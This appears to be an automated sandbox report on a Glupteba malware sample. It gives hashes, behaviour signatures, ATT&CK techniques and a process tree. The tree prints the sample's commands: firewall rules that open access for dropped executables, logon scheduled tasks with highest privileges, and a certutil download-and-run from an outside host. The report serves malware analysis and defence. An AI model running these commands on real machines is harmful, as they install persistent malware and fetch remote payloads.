Analysis

  • max time kernel
    143s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    24-05-2022 19:50

General

  • Target

    9a97d33edbdf3f58e4e02129fd9a573085de90d4ae1098ffa38fa4d0864eac9f.exe

  • Size

    3.9MB

  • MD5

    1785d20bbf66ac8afd66138781b5b9e9

  • SHA1

    a00fac5ec41193251feabd003c8af8beb4a45d40

  • SHA256

    9a97d33edbdf3f58e4e02129fd9a573085de90d4ae1098ffa38fa4d0864eac9f

  • SHA512

    95165609140e45d4f4e31170f38eb4964e49742de3ecdd04d6ab3b3dc5e72aada6f76976be025b87a06e8ea7131ef80cb6ad7cf782e1eaaa8c31d8cfcb2afbe8

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 5 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies boot configuration data using bcdedit 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Program crash 2 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9a97d33edbdf3f58e4e02129fd9a573085de90d4ae1098ffa38fa4d0864eac9f.exe
    "C:\Users\Admin\AppData\Local\Temp\9a97d33edbdf3f58e4e02129fd9a573085de90d4ae1098ffa38fa4d0864eac9f.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2364
    • C:\Users\Admin\AppData\Local\Temp\9a97d33edbdf3f58e4e02129fd9a573085de90d4ae1098ffa38fa4d0864eac9f.exe
      "C:\Users\Admin\AppData\Local\Temp\9a97d33edbdf3f58e4e02129fd9a573085de90d4ae1098ffa38fa4d0864eac9f.exe"
      2⤵
      • Adds Run key to start application
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3192
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4568
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
            PID:620
        • C:\Windows\system32\cmd.exe
          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\57c765cfdfac\57c765cfdfac\57c765cfdfac.exe" enable=yes"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1516
          • C:\Windows\system32\netsh.exe
            netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\57c765cfdfac\57c765cfdfac\57c765cfdfac.exe" enable=yes
            4⤵
              PID:1616
          • C:\Windows\rss\csrss.exe
            C:\Windows\rss\csrss.exe ""
            3⤵
            • Executes dropped EXE
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3736
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              4⤵
              • Creates scheduled task(s)
              PID:2892
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://hotbooks.tech/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
              4⤵
              • Creates scheduled task(s)
              PID:1980
            • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
              "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
              4⤵
              • Executes dropped EXE
              PID:2960
            • C:\Windows\system32\bcdedit.exe
              C:\Windows\Sysnative\bcdedit.exe /v
              4⤵
              • Modifies boot configuration data using bcdedit
              PID:2116
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 700
            3⤵
            • Program crash
            PID:224
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2364 -s 912
          2⤵
          • Program crash
          PID:1248
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
        1⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4500
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2364 -ip 2364
        1⤵
          PID:5000
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3192 -ip 3192
          1⤵
            PID:5012

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Execution

          Scheduled Task

          1
          T1053

          Persistence

          Modify Existing Service

          1
          T1031

          Registry Run Keys / Startup Folder

          1
          T1060

          Scheduled Task

          1
          T1053

          Privilege Escalation

          Scheduled Task

          1
          T1053

          Defense Evasion

          Modify Registry

          1
          T1112

          Discovery

          Query Registry

          1
          T1012

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
            Filesize

            1.7MB

            MD5

            13aaafe14eb60d6a718230e82c671d57

            SHA1

            e039dd924d12f264521b8e689426fb7ca95a0a7b

            SHA256

            f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

            SHA512

            ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

          • C:\Windows\rss\csrss.exe
            Filesize

            3.9MB

            MD5

            1785d20bbf66ac8afd66138781b5b9e9

            SHA1

            a00fac5ec41193251feabd003c8af8beb4a45d40

            SHA256

            9a97d33edbdf3f58e4e02129fd9a573085de90d4ae1098ffa38fa4d0864eac9f

            SHA512

            95165609140e45d4f4e31170f38eb4964e49742de3ecdd04d6ab3b3dc5e72aada6f76976be025b87a06e8ea7131ef80cb6ad7cf782e1eaaa8c31d8cfcb2afbe8

          • C:\Windows\rss\csrss.exe
            Filesize

            3.9MB

            MD5

            1785d20bbf66ac8afd66138781b5b9e9

            SHA1

            a00fac5ec41193251feabd003c8af8beb4a45d40

            SHA256

            9a97d33edbdf3f58e4e02129fd9a573085de90d4ae1098ffa38fa4d0864eac9f

            SHA512

            95165609140e45d4f4e31170f38eb4964e49742de3ecdd04d6ab3b3dc5e72aada6f76976be025b87a06e8ea7131ef80cb6ad7cf782e1eaaa8c31d8cfcb2afbe8

          • memory/620-135-0x0000000000000000-mapping.dmp
          • memory/1516-136-0x0000000000000000-mapping.dmp
          • memory/1616-139-0x0000000000000000-mapping.dmp
          • memory/1980-147-0x0000000000000000-mapping.dmp
          • memory/2116-150-0x0000000000000000-mapping.dmp
          • memory/2364-132-0x0000000000400000-0x0000000000C53000-memory.dmp
            Filesize

            8.3MB

          • memory/2364-130-0x00000000013EE000-0x0000000001795000-memory.dmp
            Filesize

            3.7MB

          • memory/2364-131-0x00000000017A0000-0x0000000001E96000-memory.dmp
            Filesize

            7.0MB

          • memory/2892-146-0x0000000000000000-mapping.dmp
          • memory/2960-148-0x0000000000000000-mapping.dmp
          • memory/3192-140-0x0000000000400000-0x0000000000C53000-memory.dmp
            Filesize

            8.3MB

          • memory/3192-138-0x00000000015A0000-0x0000000001C96000-memory.dmp
            Filesize

            7.0MB

          • memory/3192-137-0x00000000011F0000-0x0000000001597000-memory.dmp
            Filesize

            3.7MB

          • memory/3192-133-0x0000000000000000-mapping.dmp
          • memory/3736-144-0x0000000001600000-0x00000000019A6000-memory.dmp
            Filesize

            3.6MB

          • memory/3736-145-0x0000000000400000-0x0000000000C53000-memory.dmp
            Filesize

            8.3MB

          • memory/3736-141-0x0000000000000000-mapping.dmp
          • memory/4568-134-0x0000000000000000-mapping.dmp